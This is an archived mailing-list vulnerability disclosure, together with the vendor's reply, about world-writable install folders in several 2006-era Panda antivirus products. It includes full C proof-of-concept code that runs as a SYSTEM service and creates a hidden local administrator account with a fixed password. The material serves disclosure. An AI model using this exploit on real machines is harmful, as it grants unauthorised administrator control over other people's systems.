Re: SECURITY.NNOV: Panda Platinum Internet Security privilege escalation / bayesian filter control security vulnerabilities

Panda is realy great and realy fast. The Bug was also reported at 16.07.06 to the beta team.

-------------------- 16.07.06 --------------------

Hi there,

i think there are some badly set filesystem permissions in your software.

FileSecure 7.01.10
C:\Programme\Panda Software\AVNT everybody full access

Titanium 2006 (5.03.00)
C:\Programme\Panda Software\ everybody full access

AntiVirus 2007 (2.00.80)
C:\Programme\Panda Software\ everybody full access

Platinum Internet Security 2006 (10.02.00)
C:\Programme\Panda Software\ everybody full access

it is possible to place a binary in the directory and let it execute at startup
as an service with system privs.

example for AntiVirus 2007 (2.00.80):

build it an place it in "C:\Programme\Panda Software\Panda Antivirus 2007"
for english Windows Version Porgram Files or somethin like this.

// --- pavsrv50.c ---
#include <windows.h>
#include <stdio.h>

INT main( VOID )
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];

GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir );

system( szCmdLine );

printf( "Adding user \"owner\" to the local Administrators group...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir );

system( szCmdLine );

return 0;
// --- pavsrv50.c ---

sorry for my bad english :)

testit on german windows xp sp2 all hotfixes and german windows 2k sp4 all hotfixes

btw. check the " if you install services

BTW: FileSecure 8.00.20 has the same vulnarability

I think the best solution is to change the AV Produkt.

Panda answer:
----------------- 21.07.06 -----------------------
Dear beta-tester,

Thank you very much for joining our beta program and reporting your tests so far.

We comment you that "Panda Antivirus + Firewall 2007" and "Panda Internet Security 2007" have a Shield to protect its processes and files.

All incidents and comments received will help us to build a better product.

Please, do not doubt to report us any other incident or query that you may have.

Best regards,

Beta Area
Quality Assurance Division

Panda Software
Protection against viruses, spyware, hackers, spam and other Internet threats
Buenos Aires, 12

Relevant Pages

  • Re: Office 2010 Beta - problem found, where to report?
    ... BTDT and have other methods of reporting bugs. ... But I agree, reporting via the beta forum isn't going to be all that effective, if it has any ... The Send a Frown method is a more uniform reporting method that Microsoft ...
  • Re: Panda Active Scan Pro trial?
    ... thousand Spyware entries (after a clean run from Spybot, Ad-Aware, and ... Don't know about Panda, but... ... that your installed AV was not reporting. ... found by Panda in my Norton Recycle Bin, ...
  • Re: GpsMap276C software 3.93 Beta Available
    ... I never risk these Beta downloads. ... I reported bugs in the program, ... Sending feedback to Garmin seems to be a one way street. ... waste your time e-mailing or Faxing them reporting problems and trying ...
  • Re: [opensuse] Firefox3 and big icons
    ... I recently tried to update firefox to the new beta (both through smart ... and when using the .tgz). ... all icons are huge (the toolbars are about ... but I couldn't find anyone reporting the same issue on ...
  • Re: Warning IE8 RC1
    ... Even in MS TechNet, most are reporting that IE8 is a slug in performance, very disappointing, and having crash problems. ... Most are installing Firefox to avoid IE8. ... Oh, and I couldn't give a rat's a** what any of you want to call it, Beta, RC1, blah, blah, blah, it's STILL in a TESTING stage and mot meant for EVERYONE to use in the wilds as their main browser. ... Just like beta testing for those who refuse to call it a beta LOL. ...